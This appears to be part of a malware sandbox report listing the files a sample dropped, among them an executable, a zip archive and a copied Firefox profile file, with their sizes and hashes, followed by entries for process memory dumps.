C:\Users\Admin\AppData\Roaming\DolphinDumps\8CB16F

Filesize
138B

MD5
739ae9b7e1b6c230450d714148f6093c

SHA1
8584a0b369296a35418a5fa45d5134484c6d10b8

SHA256
5288e60ec3be53bdbb641b1859e0bfff8bc3e3378845e0d21da574154e414bdd

SHA512
bb909ac7c50e6c13cbe67f3c2152d75318af882872681397b88f0f6f28edd222d99c6b84dbe42b401ed9c626add6f541460a647425db23a3926091b1119f3186

Download Submit
C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe

Filesize
164KB

MD5
75375c22c72f1beb76bea39c22a1ed68

SHA1
e1652b058195db3f5f754b7ab430652ae04a50b8

SHA256
8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

SHA512
1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

Download Submit
C:\Users\Admin\AppData\Roaming\DolphinDumps\jvx

Filesize
53B

MD5
c16330b5345b80ba27af8bfd4299904e

SHA1
9f573e303431e956395dc09c510c445ae55ef7d7

SHA256
d6306f25b6b4cf4d6a82a4bbb691932ad74730ec3d9a4c2d5ec90b1574d4bafe

SHA512
173f20932faf91348ae1b26bc99dffd4b438b6868921e5b5352fb1b513382203e49643dd2129b7365d570159dadf108440141d4d77193c1c6108a2140b9ce3f6

Download Submit
C:\Users\Admin\AppData\Roaming\DolphinDumps\xhwq.zip

Filesize
996KB

MD5
9e73fb50d37e37ee8bd19a8e3d2b82ca

SHA1
3db1c548e86e4bb7457324a3097b05da15b7ffc3

SHA256
68ba7122ee8d9ce34ed94b6036a171ce38d6d9d9b3a609c2f4de773f4dd40d5c

SHA512
b41209300f018103b0f8a4de0537f348a3bdfcbc8feb19e7fec6634b06c266cc442145fd2d9230f827f273b0d07bb6bbcab7a0f0e9e1f558e6dd7a076f568094

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\Profiles\n4zftpal.default-release\webappsstore.sqlite-shm

Filesize
32KB

MD5
b7c14ec6110fa820ca6b65f5aec85911

SHA1
608eeb7488042453c9ca40f7e1398fc1a270f3f4

SHA256
fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb

SHA512
d8d75760f29b1e27ac9430bc4f4ffcec39f1590be5aef2bfb5a535850302e067c288ef59cf3b2c5751009a22a6957733f9f80fa18f2b0d33d90c068a3f08f3b0

Download Submit
memory/4220-624-0x0000000004440000-0x000000000449A000-memory.dmp

Filesize
360KB

Download
memory/4220-1037-0x0000000004440000-0x000000000449A000-memory.dmp

Filesize
360KB

Download
memory/4220-622-0x0000000004440000-0x000000000449A000-memory.dmp

Filesize
360KB

Download
memory/4220-621-0x0000000004440000-0x000000000449A000-memory.dmp

Filesize
360KB

Download
memory/4220-623-0x0000000004440000-0x000000000449A000-memory.dmp

Filesize
360KB

Download
memory/4220-1238-0x0000000004440000-0x000000000449A000-memory.dmp

Filesize
360KB

Download
memory/4220-1341-0x0000000004440000-0x000000000449A000-memory.dmp

Filesize
360KB

Download
memory/4220-625-0x0000000004440000-0x000000000449A000-memory.dmp

Filesize
360KB

Download
memory/4220-620-0x0000000004440000-0x000000000449A000-memory.dmp

Filesize
360KB

Download
memory/5004-1358-0x0000000004DB0000-0x0000000004E21000-memory.dmp

Filesize
452KB

Download
memory/5004-1360-0x0000000004DB0000-0x0000000004E21000-memory.dmp

Filesize
452KB

Download
memory/5004-1359-0x0000000004DB0000-0x0000000004E21000-memory.dmp

Filesize
452KB

Download
memory/5004-1361-0x0000000004DB0000-0x0000000004E21000-memory.dmp

Filesize
452KB

Download
memory/5004-1356-0x0000000004DB0000-0x0000000004E21000-memory.dmp

Filesize
452KB

Download
memory/5004-1489-0x0000000004DB0000-0x0000000004E21000-memory.dmp

Filesize
452KB

Download
memory/5004-1495-0x0000000004DB0000-0x0000000004E21000-memory.dmp

Filesize
452KB

Download
memory/5004-1357-0x0000000004DB0000-0x0000000004E21000-memory.dmp

Filesize
452KB

Download